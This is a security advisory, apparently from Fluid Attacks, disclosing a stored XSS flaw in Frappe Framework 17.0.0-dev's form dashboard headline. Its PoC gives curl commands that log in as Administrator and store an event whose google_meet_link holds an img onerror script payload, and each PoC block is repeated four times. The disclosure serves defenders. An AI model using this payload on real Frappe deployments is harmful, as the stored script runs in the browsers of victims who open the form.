Solução

Planos

Recursos

Advisories

Empresa

Select Language



Contatar vendas

Fazer login

Teste gratuito

Select Language



Contatar vendas

Teste gratuito

Select Language





Advisories

Frappe Framework 17.0.0-dev - Stored XSS in Form Dashboard headline rendering

4,6

Medium

Detected by

Fluid Attacks AI SAST Scanner

Disclosed by

Oscar Uribe

Summary

Full name

Frappe Framework 17.0.0-dev - Stored XSS in Form Dashboard headline rendering

Code name

aterciopelados

State

Public

Release date

24 de jun. de 2026

Affected product

Frappe Framework

Vendor

Frappe

Affected version(s)

17.0.0-dev

Vulnerability name

Stored cross-site scripting (XSS)

Vulnerability type

010. Stored cross-site scripting (XSS)

Remotely exploitable

Yes

CVSS v4.0 vector string

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

CVSS v4.0 base score

4.6

Exploit available

Yes

CVE ID(s)

CVE-2026-50705

Description

A Cross-Site Scripting (XSS) vulnerability exists in Frappe Framework version 17.0.0-dev due to improper neutralization of untrusted input in the Form Dashboard headline renderer. The headline rendering pipeline accepts HTML strings and inserts them into Desk forms using jQuery's .html() method without sanitization.

An attacker who can influence values incorporated into headline messages may inject arbitrary HTML or JavaScript that is executed when the affected form is viewed. This issue is exploitable when form scripts interpolate attacker-controlled or externally sourced data into dashboard headlines.

Vulnerability

Case A: `Event.google_meet_link` to headline HTML sink

Source: google_meet_link is populated from Google Calendar hangoutLink during sync:
- insert path: "google_meet_link": event.get("hangoutLink")
- update path: calendar_event.google_meet_link = event.get("hangoutLink")
Client interpolation: Event form refresh builds HTML with direct interpolation into an anchor attribute:
- `<a target='_blank' href='${frm.doc.google_meet_link}'>Google Meet</a>`
Headline dispatch chain:
- frm.dashboard.set_headline(...) -> frm.set_headline(...) -> frm.layout.show_message(...)
Sink behavior:
- frappe.utils.is_html(html) checks only for presence of HTML elements.
- If true, show_message uses .html(html) (unsanitized insertion).
Impact: malicious payload stored in google_meet_link can execute when a victim opens/reloads the Event form.

Case B: helper path forcing HTML branch

set_headline_alert(text, ...) wraps input as <div>${text}</div>.
This guarantees is_html(...) === true and routes content into .html(...) branch.
Any script that passes untrusted/echoed text into set_headline_alert reaches the same sink.

Relevant code:

frappe/frappe/desk/doctype/event/event.js:54-57
frappe/frappe/public/js/frappe/form/dashboard.js:648-650
frappe/frappe/public/js/frappe/form/form.js:1519-1530
frappe/frappe/public/js/frappe/form/layout.js:106-121
frappe/frappe/public/js/frappe/utils/utils.js:158-167
frappe/frappe/integrations/doctype/google_calendar/google_calendar.py:392
frappe/frappe/integrations/doctype/google_calendar/google_calendar.py:433
frappe/frappe/integrations/doctype/google_calendar/google_calendar.py:490
frappe/frappe/core/doctype/data_import/data_import.js:174 (additional headline call site pattern)

PoC

Reproduction used in validation environment

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

Create an Event with a crafted google_meet_link payload and future ends_on:

EVENT_NAME=$(curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={
    "doctype":"Event",
    "subject":"Dashboard Headline XSS PoC 1",
    "event_type":"Public",
    "starts_on":"2026-03-11 09:00:00",
    "ends_on":"2026-12-31 09:30:00",
    "google_meet_link":"https://meet.google.com/demo'\''><img src=x onerror=alert(9771)>"
  }' | jq -r '.message.name')

echo "$EVENT_NAME"

EVENT_NAME=$(curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={
    "doctype":"Event",
    "subject":"Dashboard Headline XSS PoC 1",
    "event_type":"Public",
    "starts_on":"2026-03-11 09:00:00",
    "ends_on":"2026-12-31 09:30:00",
    "google_meet_link":"https://meet.google.com/demo'\''><img src=x onerror=alert(9771)>"
  }' | jq -r '.message.name')

echo "$EVENT_NAME"

EVENT_NAME=$(curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={
    "doctype":"Event",
    "subject":"Dashboard Headline XSS PoC 1",
    "event_type":"Public",
    "starts_on":"2026-03-11 09:00:00",
    "ends_on":"2026-12-31 09:30:00",
    "google_meet_link":"https://meet.google.com/demo'\''><img src=x onerror=alert(9771)>"
  }' | jq -r '.message.name')

echo "$EVENT_NAME"

EVENT_NAME=$(curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={
    "doctype":"Event",
    "subject":"Dashboard Headline XSS PoC 1",
    "event_type":"Public",
    "starts_on":"2026-03-11 09:00:00",
    "ends_on":"2026-12-31 09:30:00",
    "google_meet_link":"https://meet.google.com/demo'\''><img src=x onerror=alert(9771)>"
  }' | jq -r '.message.name')

echo "$EVENT_NAME"

Open the created Event form:

echo "http://localhost:18080/desk/event/${EVENT_NAME}"

echo "http://localhost:18080/desk/event/${EVENT_NAME}"

echo "http://localhost:18080/desk/event/${EVENT_NAME}"

echo "http://localhost:18080/desk/event/${EVENT_NAME}"

Expected result:

The dashboard headline renders and executes alert(9771) when the malicious HTML is parsed.

Evidence of Exploitation

Video of exploitation:

Our security policy

We have reserved the ID CVE-2026-50705 to refer to this issue from now on.

System Information

Frappe Framework
Version 17.0.0-dev
Operating System: Any

References

Github Repository: https://github.com/frappe/frappe
Security: https://github.com/frappe/frappe/security

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Oscar Uribe from Fluid Attacks' Offensive Team using the AI SAST Scanner.

Timeline



4 de jun. de 2026

Vulnerability discovered



5 de jun. de 2026

Vendor contacted



7 de jun. de 2026

Vendor replied



24 de jun. de 2026

Public disclosure

Does your application use this vulnerable software?

During our free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.

Start free trial

As soluções da Fluid Attacks permitem que as organizações identifiquem, priorizem e corrijam vulnerabilidades em seus softwares ao longo do SDLC. Com o apoio de IA, ferramentas automatizadas e pentesters, a Fluid Attacks acelera a mitigação da exposição ao risco das empresas e fortalece sua postura de cibersegurança.

Consulta IA sobre Fluid Attacks